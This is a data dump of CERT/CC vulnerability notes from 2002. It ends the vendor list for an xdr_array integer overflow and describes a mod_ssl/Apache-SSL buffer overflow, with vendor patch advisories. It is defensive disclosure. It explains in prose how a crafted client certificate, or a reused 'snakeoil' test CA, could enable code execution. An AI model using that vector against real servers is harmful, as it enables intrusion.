Feedback>).\n\n### __ Alcatel\n\nNotified: July 30, 2002 Updated: July 31, 2002 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23192995 Feedback>).\n\n### __ Cisco Systems, Inc.\n\nNotified: July 30, 2002 Updated: July 31, 2002 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23192995 Feedback>).\n\n### __ Computer Associates\n\nNotified: July 30, 2002 Updated: July 31, 2002 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23192995 Feedback>).\n\n### __ __ Cray Inc.\n\nNotified: July 29, 2002 Updated: August 01, 2002 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nCray Inc. is still investigating this issue. Concerned customers can refer to Cray SPR 722876 for details.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23192995 Feedback>).\n\n### __ Data General\n\nNotified: July 29, 2002 Updated: July 31, 2002 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23192995 Feedback>).\n\n### __ F5 Networks, Inc.\n\nNotified: July 30, 2002 Updated: July 31, 2002 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23192995 Feedback>).\n\n### __ Fujitsu\n\nNotified: July 29, 2002 Updated: July 31, 2002 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23192995 Feedback>).\n\n### __ Guardian Digital Inc.\n\nNotified: July 29, 2002 Updated: July 31, 2002 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23192995 Feedback>).\n\n### __ Intel\n\nNotified: July 30, 2002 Updated: July 31, 2002 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23192995 Feedback>).\n\n### __ Lucent Technologies\n\nNotified: July 30, 2002 Updated: July 31, 2002 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23192995 Feedback>).\n\n### __ Mandriva, Inc.\n\nNotified: July 29, 2002 Updated: July 31, 2002 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23192995 Feedback>).\n\n### __ NEC Corporation\n\nNotified: July 29, 2002 Updated: July 31, 2002 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23192995 Feedback>).\n\n### __ NeXT\n\nNotified: July 29, 2002 Updated: July 31, 2002 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23192995 Feedback>).\n\n### __ Nortel Networks, Inc.\n\nNotified: July 30, 2002 Updated: July 31, 2002 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23192995 Feedback>).\n\n### __ SUSE Linux\n\nNotified: July 29, 2002 Updated: July 31, 2002 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23192995 Feedback>).\n\n### __ Sequent Computer Systems, Inc.\n\nNotified: July 29, 2002 Updated: July 31, 2002 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23192995 Feedback>).\n\n### __ Sony Corporation\n\nNotified: July 29, 2002 Updated: July 31, 2002 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23192995 Feedback>).\n\n### __ The Open Group\n\nNotified: July 29, 2002 Updated: July 31, 2002 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23192995 Feedback>).\n\n### __ The SCO Group (SCO Linux)\n\nNotified: July 29, 2002 Updated: July 31, 2002 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23192995 Feedback>).\n\n### __ The SCO Group (SCO Unix)\n\nNotified: July 29, 2002 Updated: July 31, 2002 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23192995 Feedback>).\n\n### __ Unisphere Networks\n\nNotified: July 30, 2002 Updated: August 01, 2002 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23192995 Feedback>).\n\n### __ Unisys\n\nNotified: July 29, 2002 Updated: July 31, 2002 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23192995 Feedback>).\n\n### __ Wind River Systems, Inc.\n\nNotified: July 29, 2002 Updated: July 31, 2002 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23192995 Feedback>).\n\n### __ Xi Graphics\n\nNotified: July 29, 2002 Updated: July 31, 2002 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23192995 Feedback>).\n\nView all 45 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * [http://www.FreeBSD.org/cgi/man.cgi?query=xdr_array&amp;apropos=0&amp;sektion=3&amp;manpath=FreeBSD+4.6-RELEASE&amp;format=html](<http://www.FreeBSD.org/cgi/man.cgi?query=xdr_array&apropos=0&sektion=3&manpath=FreeBSD+4.6-RELEASE&format=html>)\n * <ftp://ftp.isi.edu/in-notes/rfc4506.txt>\n * [http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert%2F46122&amp;zone_32=category%3Asecurity](<http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert%2F46122&zone_32=category%3Asecurity>)\n * <http://web.mit.edu/kerberos/www/advisories/MITKRB5-SA-2002-001-xdr.txt>\n * <http://CERT.Uni-Stuttgart.DE/advisories/calloc.php>\n * <http://online.securityfocus.com/bid/5356>\n * <http://www.iss.net/security_center/static/9170.php>\n * <http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=20823>\n\n### Acknowledgements\n\nThanks to Sun Microsystems for working with the CERT/CC to make this document possible. The initial vulnerability research and demonstration was performed by Internet Security Systems (ISS). \n\nThis document was written by Jeffrey S. Havrilla. \n\n### Other Information\n\n**CVE IDs:** | [CVE-2002-0391](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0391>) \n---|--- \n**CERT Advisory:** | [CA-2002-25 ](<http://www.cert.org/advisories/CA-2002-25.html>) \n**Severity Metric:****** | 27.29 \n**Date Public:** | 2002-07-31 \n**Date First Published:** | 2002-08-01 \n**Date Last Updated: ** | 2006-05-15 15:47 UTC \n**Document Revision: ** | 45 \n", "modified": "2006-05-15T15:47:00", "published": "2002-08-01T00:00:00", "id": "VU:192995", "href": "https://www.kb.cert.org/vuls/id/192995", "type": "cert", "title": "Integer overflow in xdr_array() function when deserializing the XDR stream", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T20:45:10", "bulletinFamily": "info", "description": "### Overview \n\nThere is a remotely exploitable buffer overflow in two modules that implement the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocol. This can be used to execute arbitrary code.\n\n### Description \n\nThe [Secure Sockets Layer (SSL)](<http://www.netscape.com/eng/ssl3/>) and [Transport Layer Security (TLS)](<http://www.ietf.org/rfc/rfc2246.txt>) protocols are used to provide a secure connection between a client and server for higher level protocols such as HTTP. Apache_SSL and mod_ssl are two modules for Apache that both call an OpenSSL routine i2d_SSL_SESSION() to help create an SSL/TLS session. This routine converts the SSL/TLS session data into a format that can be stored in the session cache. The [OpenSSL d2i_SSL_SESSION.pod document](<http://www.cise.ufl.edu/depot/doc/openssl/ssl/d2i_SSL_SESSION.pod>) states that the routine should be called to first determine the size of the buffer needed to store the session data. Then the appropriately sized buffer should be allocated and finally the routine should be called again to convert the data.\n\nThese two modules fail to follow this procedure, and use a statically defined buffer to store the results of the i2d_SSL_SESSION() routine. By establishing an SSL Session, with a large crafted client certificate signed by a trusted CA, an attacker may be able to execute arbitrary code. If the target server trusts multiple CAs, then the target server's risk of receiving a malicious certificate is increased. \n \nClient certificates are generated when a Certificate Signature Request (CSR) is made of a Certificate Authority (CA). The CA signs the CSR with their server certificate and the resulting certificate is sent back to the client. Since some of the data in the CSR is entered by the person making the request, it is possible to submit a large crafted CSR for signature and have the CA sign it without suspicion. \n \nIt should be noted that for testing purposes mod_ssl ships a static \"snakeoil\" CA server certificate. It is clearly stated that this certificate should not be used for production environments, and steps are given to dynamically generate a server certificate for the CA. If, however, a system uses this static \"snakeoil\" server certificate as their own CA signing certificate, then it is trivial for an attacker to craft and sign their own client side certificate that would be accepted by the victim site as being signed by the trusted CA. The MD5 checksum for these static certificates from mod_ssl version 2.8.4 for Apache version 1.3.20 are as follows: \n \n9bd1d1069c69fafed5a86ea931ae45f9 ca-bundle.crt \nb21689366a43829d83728b023b6d04b8 Makefile.crl \n0de94cb2a39ed0fc158edd053b425255 Makefile.crt \nfbb7ae5d7e39607a39b1e36d30048683 README.CRL \n84bfd413a53d6a8036311b57faa8f0c8 README.CRT \na3351dacc96ebc615d986dfdb371c856 README.CSR \n2284a70fae1cb3c1101494cff135f1f7 README.KEY \n9a611f57078e624b672222197b8ff377 README.PRM \nb269a8269073c62bd83e6635d56ec11b server.crt \n4ff42eeddd6571a29e0a7682d06137e4 server.csr \nad5dc80749418c15c3d99962f00eb2b1 server.key \n3c392576b27d8f79ab92eb39fce681f3 snakeoil-ca-dsa.crt \n05cc51fdcc3c8ef6ed6a777f460e675a snakeoil-ca-dsa.key \n3c9bf8ebd0586ce0633e7c6a85ed345a snakeoil-ca-dsa.prm \ne76c1653eb00e4c2168a9c590fcf4ed7 snakeoil-ca-rsa.crt \na55527f1b3ad826052b8f6395d0da3e4 snakeoil-ca-rsa.key \nd1701e1c69a9867943ad61432f1f44b1 snakeoil-dsa.crt \nbc6e0ae4c628088f78e22c7287647b0a snakeoil-dsa.key \n3c9bf8ebd0586ce0633e7c6a85ed345a snakeoil-dsa.prm \n6c7a7d92f67c8dbd6ca57a30da7bc3bb snakeoil-rsa.crt \nec09a963da45ee792d5eb284568894da snakeoil-rsa.key \nc98761828d8f030f973894f73e751e80 sslcfg.patch \n \nAccording to the timestamps, it appears that most of these test files have not changed since 1998-1999. \n \n--- \n \n### Impact \n\nAn attacker may be able to execute arbitrary code on the system with the privileges of the ssl module. \n \n--- \n \n### Solution \n\nUpgrade to [mod_ssl 2.8.7](<http://www.modssl.org/>) or [Apache_SSL 1.3.22+1.47](<http://www.apache-ssl.org/>), or apply the patch provided by your vendor. \n \n--- \n \n### Vendor Information\n\n234971\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ __ Apache-SSL\n\nNotified: March 01, 2002 Updated: April 04, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\n<http://www.apache-ssl.org/advisory-20020301.txt>\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nVersions of Apache-SSL prior to 1.3.22+1.47 are vulnerable.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23234971 Feedback>).\n\n### __ __ Caldera\n\nUpdated: April 02, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nSee <http://www.caldera.com/support/security/advisories/CSSA-2002-011.0.txt>\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23234971 Feedback>).\n\n### __ __ Compaq Computer Corporation\n\nUpdated: April 02, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\n\\-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1\n\nTITLE: (SSRT0817, SSRT0821) Potential Security Vulnerabilities \nwith Compaq Secure Web Server (PHP and apache/mod_ssl) \n \nPosted at <http://ftp.support.compaq.com/patches/.new/security.shtml> \n \nNOTICE: There are no restrictions for distribution of this Bulletin \nprovided that it remains complete and intact. \n \nRELEASE DATE: March 2002 \n \nSOURCE: \nCompaq Computer Corporation \nCompaq Services \nSoftware Security Response Team \n \nX-REFERENCE: CVE Candidate - PHP (CAN-2002-0081) , \nApache/mod_ssl(CAN-2002-0082) \n \nPROBLEM SUMMARY: \n \nCompaq was recently notified of two potential vulnerabilities \nthat impact Compaq's distributed Secure Web Server (CSWS) for \nOpenVMS and TRU64 UNIX. \n \n(SSRT0817) PHP \n \nPHP (Hypertext Preprocessor scripting language). PHP does not \nperform proper bounds checking on in functions related to \nForm-based File Uploads in HTML to decode MIME encoded files. \nThis potential overflow vulnerability may allow arbitrary code \nto be executed. \n \n \n \n(SSRT0821) Apache/mod_ssl \n \nApache/mod_ssl session cache management routines use an unchecked \nbuffer that could potentially allow an overflow of a session cache \nbuffer. Thispotential vulnerability may allow arbitrary code to be \nexecuted. \n \nVERSIONS IMPACTED: \n \nIMPACT: \n \nCSWS (SSRT0817) PHP (SSRT0821) \nApache/mod_ssl \n \nOpenVMS V7.1-2 \nor \nlater CSWS_PHP V1.0 CSWS V1.0-1, \nCSWS V1.1-1, \nCSWS V1.2 \n \n \nTRU64 UNIX V5.0A \nor \nlater CSWS V5.5.2 CSWS V5.5.2 \n \n \n*NOTE:These reported potential vulnerabilities do not \nhave an impact to the base operating system in the form \nof elevated permissions or privileges. \n \n \nNO IMPACT: \n \nHimalaya Web Products \n \nCompaq Management Software Web Products \n \n \nRESOLUTION: \n \nCompaq has corrected both problems and created patches that are now \navailable for CSWS (Compaq Secure Web Server) for OpenVMS and TRU64 \nUNIX. \n \nCSWS for OpenVMS V7.1-2 or later: \n \nA Compaq Secure Web Server security update kit is available for \ndownload at: \n<http://www.openvms.compaq.com/openvms/products/ips/apache/csws_patches> \n.html \n \n(SSRT0817) PHP \n \nINSTALLED VERSION UPDATE KIT \n \nCSWS_PHP 1.0 CSWS_PHP10_UPDATE V1.0 \n \n \nNOTE: (SSRT0817) PHP - For OpenVMS - if upgrading is not \npossible or a patch cannot be applied immediately, the \npotential PHP overflow vulnerability may be minimized by \nadding the following line to MOD_PHP.CONF file: \nPHP_FLAG file_uploads OFF \nThis will prevent using fileuploads, which may not be \nan acceptable short-term solution. \n \n(SSRT0821) Apache/mod_ssl \n \nInstalled Version Update Kit \n \nCSWS V1.2 CSWS12_UPDATE V1.0 \nCSWS V1.1-1 CSWS111_UPDATE V1.0 \nCSWS V1.0-1 CSWS101_UPDATE V1.0 \n \n \n \n \nTRU64 UNIX for V5.0a or later: \n \nA Compaq Secure Web Server security update kit is available for \ndownload at: \n<http://tru64unix.compaq.com/internet/download.htm#sws_v582> \nselect and install the CSWS (Compaq Secure Web Server) kit V5.8.2 \n \n \nInstalled Version Install Updated Server Kit \n \nCSWS V5.5.2 CSWS V5.8.2 \n \n \nAfter completing the update, Compaq strongly recommends that you \nperform an immediate backup of your system disk so that any \nsubsequent restore operations begin with updated software. Otherwise, \nyou must reapply the patch after a future restore operation. Also, if \nat some future time you upgrade your system to a later patch version, \nyou may need to reapply the appropriate patch. \n \n \nSUPPORT: \n \nFor further information, contact Compaq Global Services. \n \n \nSUBSCRIBE: \n \nTo subscribe to automatically receive future Security Advisories from \nthe Compaq's Software Security Response Team via electronic mail: \n<http://www.support.compaq.com/patches/mailing-list.shtml> \n \nREPORT: \n \nTo report a potential security vulnerability with any Compaq \nsupported product, send email [mailto:security-ssrt@compaq.com](<mailto:security-ssrt@compaq.com>) \n \nCompaq appreciates your cooperation and patience. We regret \nany inconvenience applying this information may cause. As always, \nCompaq urges you to periodically review your system management and \nsecurity procedures. Compaq will continue to review and enhance the \nsecurity features of its products and work with customers to maintain \nand improve the security and integrity of their systems. \n \n\"Compaq is broadly distributing this Security Advisory to notify all \nusers of Compaq products of the important security information \ncontained in this Advisory. Compaq recommends that all users \ndetermine the applicability of this information to their individual \nsituations and take appropriate action. Compaq does not warrant that \nthis information is necessarily accurate or complete for all user \nsituations and, consequently, Compaq will not be responsible for any \ndamages resulting from user's use or disregard of the information \nprovided in this Advisory.\" \n \nCopyright 2002 Compaq Information Technologies Group, L.P. Compaq \nshall not be liable for technical or editorial errors or omissions \ncontained herein. The information in this document is subject to \nchange without notice. Compaq and the names of Compaq products \nreferenced herein are, either, trademarks and/or service marks or \nregistered trademarks and/or service marks of Compaq Information \nTechnologies Group, L.P. Other product and company names mentioned \nherein may be trademarks and/or service marks of their respective \nowners. \n \n\\-----BEGIN PGP SIGNATURE----- \nVersion: PGP 7.0.1 \n \niQA/AwUBPKYaXznTu2ckvbFuEQLbTQCfarAsi8kRC4LM8mftiUv84AWBHmYAn1Z7 \nqdlODoP4yGBrHmi2hIVqr0Ia \n=egdQ \n\\-----END PGP SIGNATURE-----\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23234971 Feedback>).\n\n### __ __ Conectiva\n\nUpdated: March 04, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nSee, [http://distro.conectiva.com.br/atualizacoes/?id=a&amp;anuncio=000464&amp;ckval=en](<http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000464&ckval=en>)\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23234971 Feedback>).\n\n### __ __ Debian\n\nNotified: March 01, 2002 Updated: March 11, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nSee, <http://www.debian.org/security/2002/dsa-120>\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23234971 Feedback>).\n\n### __ __ Engarde\n\nUpdated: March 01, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\n\\-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n\n\n+------------------------------------------------------------------------+ \n| EnGarde Secure Linux Security Advisory March 01, 2002 | \n| <http://www.engardelinux.org/> ESA-20020301-005 | \n| | \n| Package: apache (mod_ssl) | \n| Summary: mod_ssl's session caching mechanisms contain a potential | \n| buffer overflow | \n+------------------------------------------------------------------------+ \n \nEnGarde Secure Linux is a secure distribution of Linux that features \nimproved access control, host and network intrusion detection, Web \nbased secure remote management, complete e-commerce using AllCommerce, \nand integrated open source security tools. \n \n \nOVERVIEW \n\\- -------- \nThere is a buffer overflow in mod_ssl, part of EnGarde's apache package, \nwhich an attacker may potentially trigger by sending a very long client \ncertificate. \n \n \nDETAIL \n\\- ------ \nmod_ssl is an apache module used to provide SSL functionality using the \nOpenSSL toolkit. Ed Moyle has discovered a buffer overflow in \nmod_ssl's session caching mechanisms using dbm and shared memory. \n \nWe would like to stress that this vulnerability is in mod_ssl, not in \napache. We are issuing an apache update because we include mod_ssl as \npart of our apache package. \n \n \nSOLUTION \n\\- -------- \nAll users should upgrade to the most recent version as outlined in \nthis advisory. \n \nGuardian Digital recently made available the Guardian Digital Secure \nUpdate, a means to proactively keep systems secure and manage \nsystem software. EnGarde users can automatically update their system \nusing the Guardian Digital WebTool secure interface. \n \nIf choosing to manually upgrade this package, updates can be \nobtained from: \n \n<ftp://ftp.engardelinux.org/pub/engarde/stable/updates/> \n<http://ftp.engardelinux.org/pub/engarde/stable/updates/> \n \nBefore upgrading the package, the machine must either: \n \na) be booted into a \"standard\" kernel; or \nb) have LIDS disabled. \n \nTo disable LIDS, execute the command: \n \n# /sbin/lidsadm -S -- -LIDS_GLOBAL \n \nTo install the updated package, execute the command: \n \n# rpm -Uvh &lt;filename&gt; \n \nYou must now update the LIDS configuration by executing the command: \n \n# /usr/sbin/config_lids.pl \n \nTo re-enable LIDS (if it was disabled), execute the command: \n \n# /sbin/lidsadm -S -- +LIDS_GLOBAL \n \nTo verify the signatures of the updated packages, execute the command: \n \n# rpm -Kv &lt;filename&gt; \n \n \nUPDATED PACKAGES \n\\- ---------------- \nThese updated packages are for EnGarde Secure Linux 1.0.1 (Finestra). \n \nSource Packages: \n \nSRPMS/apache-1.3.23-1.0.27.src.rpm \nMD5 Sum: 412c8ed8f0151dc023372b70aac0475c \n \nBinary Packages: \n \ni386/apache-1.3.23-1.0.27.i386.rpm \nMD5 Sum: 66b23a6224b1916983c4350e95c35fd6 \n \ni686/apache-1.3.23-1.0.27.i686.rpm \nMD5 Sum: 4dc0650fb82a15aa00927cabcb02b230 \n \n \nREFERENCES \n\\- ---------- \nGuardian Digital's public key: \n<http://ftp.engardelinux.org/pub/engarde/ENGARDE-GPG-KEY> \n \nCredit for the discovery of this bug goes to: \nEd Moyle &lt;emoyle@scsnet.csc.com&gt; \n \nmod_ssl's Official Web Site: \n<http://www.modssl.org/> \n \nSecurity Contact: security@guardiandigital.com \nEnGarde Advisories: <http://www.engardelinux.org/advisories.html> \n \n\\- -------------------------------------------------------------------------- \n$Id: ESA-20020301-005-apache,v 1.3 2002/03/01 05:24:50 rwm Exp $ \n\\- -------------------------------------------------------------------------- \nAuthor: Ryan W. Maple, &lt;ryan@guardiandigital.com&gt; \nCopyright 2002, Guardian Digital, Inc. \n \n\\-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.0.6 (GNU/Linux) \nComment: For info see <http://www.gnupg.org> \n \niD8DBQE8fxtOHD5cqd57fu0RAs4YAJwI63Bvsu3ovXom2fpYe3uUVwaQhQCcDmhE \nmkmxGGvF3L1LAN+eT5D8uU0= \n=dudS \n\\-----END PGP SIGNATURE----- \n\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23234971 Feedback>).\n\n### __ __ Hewlett Packard\n\nNotified: March 01, 2002 Updated: March 27, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nHP Support Information Digests\n\n=============================================================================== \no Security Bulletin Digest Split \n\\------------------------------ \n \nThe security bulletins digest has been split into multiple digests \nbased on the operating system (HP-UX, MPE/iX, and HP Secure OS \nSoftware for Linux). You will continue to receive all security \nbulletin digests unless you choose to update your subscriptions. \n \nTo update your subscriptions, use your browser to access the \nIT Resource Center on the World Wide Web at: \n \n<http://www.itresourcecenter.hp.com/> \n \nUnder the Maintenance and Support Menu, click on the \"more...\" link. \nThen use the 'login' link at the left side of the screen to login \nusing your IT Resource Center User ID and Password. \n \nUnder the notifications section (near the bottom of the page), select \nSupport Information Digests. \n \nTo subscribe or unsubscribe to a specific security bulletin digest, \nselect or unselect the checkbox beside it. Then click the \n\"Update Subscriptions\" button at the bottom of the page. \n \no IT Resource Center World Wide Web Service \n\\--------------------------------------------------- \n \nIf you subscribed through the IT 